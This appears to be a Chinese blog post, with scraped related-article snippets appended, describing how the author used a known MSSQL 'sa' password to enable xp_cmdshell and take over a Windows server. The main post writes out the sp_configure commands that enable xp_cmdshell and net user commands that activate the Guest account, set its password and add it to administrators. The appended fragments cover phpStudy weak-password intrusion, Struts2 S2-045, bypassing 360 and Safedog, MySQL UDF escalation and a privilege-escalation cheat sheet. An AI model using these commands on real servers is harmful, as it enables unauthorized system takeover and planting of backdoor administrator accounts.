一次利用MSSQL的SA账户提权获取服务器权限

遇到小人,把服务器整走了

自己手里只有sql server的sa账号密码

模糊记起之前用这个账户提权读取文件的事

百度之,发现相关信息一堆堆

各种工具也用了不少 发现不是语法错误就是权限不够

无奈之下装了sql server r2直接来操作

顺利连接上去,看到有master这个库。

直奔重点去

这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它

尝试用正常的方法打开xp_cmdshell:

EXEC sp_configure ‘show advanced options‘, 1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell‘, 1;
RECONFIGURE;
exec sp_configure

  

看来运气还是不错滴,xp_cmdshell顺利打开了。然后就可以直接执行cmd命令了:

exec xp_cmdshell ‘ net user Guest Qwer123456789‘
exec xp_cmdshell ‘ net user Guest /active:yes‘
exec xp_cmdshell ‘net localgroup administrators Guest /add‘

算是顺利

没什么障碍

最后附上一张远程登录的截图

时间: 2024-10-10 02:48:55

一次利用MSSQL的SA账户提权获取服务器权限的相关文章

利用phpStudy 探针 提权网站服务器

声明: 本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途! 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧. 搜索引擎KeyWord: phpStudy 探针 2014 多往后翻翻.翻个几十页最好. 点开搜索到的内容. 点开搜索到的内容. 翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root): 1. 如果提示正常.请在网页后面加上 'phpmyadmin',如 http:

​如何快速利用s02-45漏洞获取服务器权限

byantian365.com simeon 1.1CVE-2017-5638漏洞简介 Apache Struts 2是世界上最流行的JavaWeb服务器框架之一.然而在Struts 2上发现存在高危安全漏洞(CVE-2017-5638,S02-45),该漏洞影响到:Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts2.5.10 漏洞编号:CVE-2017-5638 漏洞等级:HIGH 漏洞名称:S2-045:Struts 2远程执行代码漏洞 漏洞影

安全狗+360全套下提权(system权限)

起因:某日某群某人 有句话说的很好"如果你还没瞎,就别用耳朵去了解!" ,还是自己去琢磨下比较保险. 运气好,是system权限. 本以为应该很简单,但是-- systeminfo查询得出系统信息:win7旗舰版 目测X86系统. 没错就是win7,但发现3389无法连接.随机执行tasklist /svc命令得出:360全套+服务器安全狗 在通过netstat -ano命令得出:3389端口是开启 出现上面得出思路:1.tcp/ip筛选2.防火墙3.安全狗拦截4.内网环境一般情况大家

峰回路转的提权08r2服务器

事前日下这个站的时候说实话,略微的蛋疼.其过程就不写了,就讲讲提权吧.可能图片有点暗.看看我写这篇文章的时候就知道了. 这个学校我好多同学在里面读书,就萌生了.日下这个站的想法. 拿到shell,理所应当的是收集信息了. 2008r2的,哇靠哦.我第一反应就是再看看端口,因为一般08r2的exp能用的不多.先看看有没有waf. 第一个大家并不陌生,360嘛.至于第二个,可能有部分的同学不知道.是一个很出名的远控软件.速度相对比其他的好得多,你懂的.但是呢,有一个exp可以读取其账户资料的.也就是

MySQL UDF提权获取主机控制权

UDF(User defined function)是MySQL的一个拓展接口,用来扩展MySQL的功能.在具备MySQL管理员访问权限的条件下,可利用该特性进行提权,获取所在主机的控制权.下面以windows主机为例,给出具体的步骤: 1.python clock.py -d -i lib_mysqludfsys.dll此步是获取攻击用的UDF dll.首先要安装sqlmap,然后运行上述命令即可得到解码之后的UDF dll.(sqlmap对其进行编码是为了免杀) 2.mysql -h tar

Java爬虫(一)利用GET和POST发送请求,获取服务器返回信息

本人所使用软件 eclipse fiddle UC浏览器 分析请求信息 以知乎(https://www.zhihu.com)为例,模拟登陆请求,获取登陆后首页,首先就是分析请求信息. 用UC浏览器F12,点击Network,按F5刷新.使用自己账号登陆知乎后,点www.zhihu.com网址后,出现以下界面  在General中,看到请求方式是GET,在fiddle里请求构造中,方法选定GET. 下拉后,看到Request Header,将里面所有的内容复制下来,粘贴到fiddle的请求构造里 

web提权笔记

[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com

web提权思路

1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都

提权笔记本

/* 转载请注明出处 ID:珍惜少年时 */ 21------------FTP //找到其FTP目录,破解其密码搜索,提之 22------------linux终端 23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之 3306----------mysql